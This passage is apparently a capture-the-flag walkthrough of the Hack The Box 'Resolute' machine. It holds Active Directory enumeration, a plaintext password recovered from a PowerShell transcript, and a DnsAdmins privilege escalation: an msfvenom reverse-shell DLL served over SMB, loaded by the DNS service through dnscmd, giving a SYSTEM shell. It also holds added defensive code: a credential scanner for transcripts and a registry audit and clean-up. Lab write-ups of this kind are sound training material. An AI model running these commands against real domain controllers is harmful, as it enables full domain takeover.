objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=megabank,DC=local
dSCorePropagationData: 20190927221048.0Z
dSCorePropagationData: 20190927105650.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132230019584087698
msDS-SupportedEncryptionTypes: 0
He belongs to a group we do not have access to: Contractors. We can also use melanie's shell on the server to get more information.
PS > net user ryan /domain
User name ryan
Full Name Ryan Bertrand
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/11/2020 3:23:02 AM
Password expires Never
Password changeable 1/12/2020 3:23:02 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Contractors
The command completed successfully.
We can also run post/windows/gather/enum_ad_groups or post/windows/gather/enum_ad_users, or rpcclient:
$ rpcclient -U melanie 10.10.10.169
Unable to initialize messaging context
Enter WORKGROUP\melanie's password
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Contractors] rid:[0x44f]
rpcclient $> queryuser 0x451
User Name : ryan
Full Name : Ryan Bertrand
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : jeu., 01 janv. 1970 01:00:00 CET
Logoff Time : jeu., 01 janv. 1970 01:00:00 CET
Kickoff Time : jeu., 01 janv. 1970 01:00:00 CET
Password last set Time : sam., 11 janv. 2020 12:34:03 CET
Password can change Time : dim., 12 janv. 2020 12:34:03 CET
Password must change Time: jeu., 14 sept. 30828 04:48:05 CEST
unknown_2[0..31]...
user_rid : 0x451
group_rid: 0x201
acb_info : 0x00000210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000000
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $>
Let's try to get into Ryan's account. A terrible mistake I made was not listing hidden directories: I was using dir, but it does not show ALL directories.
If you want to list all directories, use dir -Force in PowerShell or dir /ah from cmd.
PS > cd c:\
PS > dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
PS > dir -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 1/10/2020 4:58 PM 402653184 pagefile.sys
PSTranscripts is not one of the directories usually present at C:\, so let's dig inside it.
PS > dir -Force -Recurse
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
This file seems interesting; it looks like a log or debug file.
PS > type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
It's a PowerShell transcript file, and a dumb mistake is leaking ryan's password to us!
cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
We can now use his account to gather more information about him.
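The leak above happens because transcription persists every command a user typed, password included, into a file that other users of the host could read. As an added defender's example (not code from the original post), here is a small scanner for transcript directories such as C:\PSTranscripts: it walks the transcript format shown above, extracts each recorded command, and reports those that embed a plaintext credential with the secret redacted. The sample transcript is constructed to mirror the format above; the ConvertTo-SecureString case and the generic password-argument rule are assumed extra cases.

```python
"""Scan PowerShell transcripts for commands that embed plaintext credentials
(added example). Transcripts record every command a user ran, so a password
typed inline, as in the 'net use' line above, is persisted to disk for anyone
who can read the transcript directory."""
import re

# Constructed excerpt in the transcript format shown above (header block,
# 'Command start time' markers, Invoke-Expression parameter bindings).
# The ConvertTo-SecureString command is an assumed extra case.
SAMPLE_TRANSCRIPT = r"""
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="Get-ChildItem C:\Users
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
**********************
Command start time: 20191203063600
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="$s = ConvertTo-SecureString 'Hunter2!' -AsPlainText -Force
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
"""

HEADER_USER_RE = re.compile(r"^Username:\s*(.+?)\s*$")
CMD_TIME_RE = re.compile(r"^Command start time:\s*(\d{14})")
CMD_VALUE_RE = re.compile(r'ParameterBinding\(Invoke-Expression\): name="Command"; value="(.*)$')
# net use <drive> \\server\share <tail>: anything in the tail that is not a
# /switch is either the password or a mistyped credential, never harmless.
NET_USE_RE = re.compile(r"(?i)(\bnet\s+use\s+\S+\s+\\\\\S+)(.*)$")
# Generic rules (assumed extra cases): group 1 is the secret to redact.
GENERIC_RULES = [
    ("securestring-literal",
     re.compile(r"(?i)ConvertTo-SecureString\s+['\"]([^'\"]+)['\"](?=.*-AsPlainText)")),
    ("password-argument",
     re.compile(r"(?i)(?:pass(?:word)?\s*[=:]\s*|/p(?:ass(?:word)?)?:|-p(?:assword)?\s+)['\"]?([^\s'\"]+)")),
]


def extract_commands(text):
    """Yield (start_time, username, command) for every command the transcript
    recorded. The 'if (!$?) ...' wrapper the remote client appends on the
    following line is not part of the user's command and is skipped."""
    user = when = None
    for line in text.splitlines():
        m = HEADER_USER_RE.match(line)
        if m:
            user = m.group(1)
            continue
        m = CMD_TIME_RE.match(line)
        if m:
            when = m.group(1)
            continue
        m = CMD_VALUE_RE.search(line)
        if m:
            yield when, user, m.group(1).rstrip('"')


def redact_net_use(cmd):
    """Return cmd with every non-switch token after the UNC path replaced by
    <REDACTED>, or None if nothing is inline. Covers the documented form
    (password then /user:) and the mistyped form above; '*' means 'prompt'."""
    m = NET_USE_RE.search(cmd)
    if not m:
        return None
    tail = m.group(2).split()
    secrets = [t for t in tail if not t.startswith("/") and t != "*"]
    if not secrets:
        return None
    return cmd[:m.start(2)] + " " + " ".join("<REDACTED>" if t in secrets else t for t in tail)


def redact_generic(cmd):
    """Apply GENERIC_RULES; return (rule_name, redacted_cmd) or None."""
    for name, rx in GENERIC_RULES:
        m = rx.search(cmd)
        if m:
            return name, cmd[:m.start(1)] + "<REDACTED>" + cmd[m.end(1):]
    return None


def scan_transcript(text):
    """Return one finding per recorded command that embeds a plaintext credential."""
    findings = []
    for when, user, cmd in extract_commands(text):
        hit = redact_net_use(cmd)
        if hit:
            findings.append({"time": when, "user": user, "rule": "net-use-password", "command": hit})
            continue
        generic = redact_generic(cmd)
        if generic:
            findings.append({"time": when, "user": user, "rule": generic[0], "command": generic[1]})
    return findings


if __name__ == "__main__":
    for f in scan_transcript(SAMPLE_TRANSCRIPT):
        print(f"{f['time']} {f['user']} [{f['rule']}] {f['command']}")
```

Run it over the files in a transcript directory to find credentials that need rotating; the redacted output is safe to forward to a ticket or SIEM.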
C:\Windows\system32>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Ryan is actually a member of two non-default groups, Contractors and DnsAdmins. (whoami lists DnsAdmins with the type "Alias" because it is a domain-local group; it is not an alias of Contractors.) Searching for DnsAdmins quickly turns up a known privilege escalation available to members of this group:
[https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83](https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83)
I will not go into the exploit internals here, only the pentest side; follow the links if you want more information. In short, the DNS service runs as SYSTEM, and members of DnsAdmins are allowed to set its ServerLevelPluginDll setting (remotely, with dnscmd) to an arbitrary DLL, which the service loads the next time it starts. Whatever that DLL does therefore runs as SYSTEM on the domain controller.
At first sight I thought I would have to compile the DLL myself, which is rather painful, but I came across this nice write-up: http://www.abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/
We can simply generate the DLL with msfvenom to get a reverse shell, and host it on our own machine through an SMB share served by impacket. Not dropping the msf payload on the target's disk also keeps it away from the running AV (Windows Defender), which would otherwise delete it.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.37 LPORT=4444 --platform=windows -f dll > share/dns.dll
$ python2 ./smbserver.py swtch ~/nextcloud/challenges/HTB/resolute/share
Before exploiting the service, check that the share is reachable from the victim.
PS > net view \\10.10.14.37\
Shared resources at \\10.10.14.37\
(null)
Share name Type Used as Comment
-------------------------------------------------------------------------------
SWTCH Disk
The command completed successfully.
PS > Get-ChildItem \\10.10.14.37\SWTCH
Directory: \\10.10.14.37\SWTCH
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/11/2020 2:29 AM 5120 dns.dll
Everything is perfect; we even see the logs in the impacket console:
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,62171)
[*] AUTHENTICATE_MESSAGE (\,RESOLUTE)
[*] User RESOLUTE\ authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SWTCH)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,62171)
[*] Remaining connections []
Let's run the PoC:
PS > dnscmd.exe /config /serverlevelplugindll \\10.10.14.37\SWTCH\dns.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS > sc.exe stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
PS > sc.exe start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 3632
FLAGS :
w00t!
msf5 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
8 meterpreter x64/windows NT AUTHORITY\SYSTEM @ RESOLUTE 10.10.14.37:4444 -> 10.10.10.169:62407 (10.10.10.169)
msf5 exploit(multi/handler) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > shell
Process 2840 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
e1d94876a506850d0c20edb5405e619c
C:\Windows\system32>
We are root.
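Finally, as an added example (my own code, not from the write-up or the linked articles), the defender-side view of what just happened: an audit of the ServerLevelPluginDll registry value and of DnsAdmins membership, plus a clean-up function. It assumes an elevated PowerShell on the DNS server/DC and the ActiveDirectory module (RSAT) for the group lookup; the function names are mine.

```powershell
# Added example, not part of the original write-up: check and clean-up for the
# DnsAdmins technique used above. Run elevated on the DC/DNS server. Function
# names are my own; the registry value is the one "dnscmd /config
# /serverlevelplugindll" writes, and the group lookup assumes the
# ActiveDirectory module is installed.

$DnsParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsPluginDllExposure {
    [CmdletBinding()]
    param()

    # The value is absent on a clean server; after the attack it holds the DLL
    # path, here a UNC path pointing at the attacker's SMB share.
    $plugin = (Get-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll `
                 -ErrorAction SilentlyContinue).ServerLevelPluginDll

    # Every member of DnsAdmins (nested groups included) can set that value
    # remotely with dnscmd, so the membership list is the other half of the audit.
    $members = @()
    if (Get-Module -ListAvailable -Name ActiveDirectory) {
        $members = @(Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
                     Select-Object -ExpandProperty SamAccountName)
    }

    [pscustomobject]@{
        ServerLevelPluginDll = $plugin
        PluginSet            = [bool]$plugin
        PluginIsUncPath      = [bool]($plugin -and $plugin.StartsWith('\\'))
        DnsAdminsMembers     = $members
    }
}

function Clear-DnsPluginDll {
    # Removing the value is what neutralises the attack; the service must be
    # restarted afterwards to unload a DLL that is already mapped. Restarting
    # DNS on a DC interrupts name resolution, hence the -WhatIf/-Confirm support.
    [CmdletBinding(SupportsShouldProcess)]
    param()

    if ($PSCmdlet.ShouldProcess('DNS service', 'remove ServerLevelPluginDll and restart')) {
        Remove-ItemProperty -Path $DnsParams -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
        Restart-Service -Name DNS
    }
}

$state = Get-DnsPluginDllExposure
$state | Format-List
if ($state.PluginSet) {
    Write-Warning "ServerLevelPluginDll is set to '$($state.ServerLevelPluginDll)'; run Clear-DnsPluginDll to remove it."
}
```

Clear-DnsPluginDll -WhatIf previews the change; without -WhatIf it deletes the value and restarts the DNS service. Removing the value only closes this one door: the lasting fix is to keep DnsAdmins membership minimal, since anyone in that group (here ryan, through Contractors or directly) can set the value again at any time.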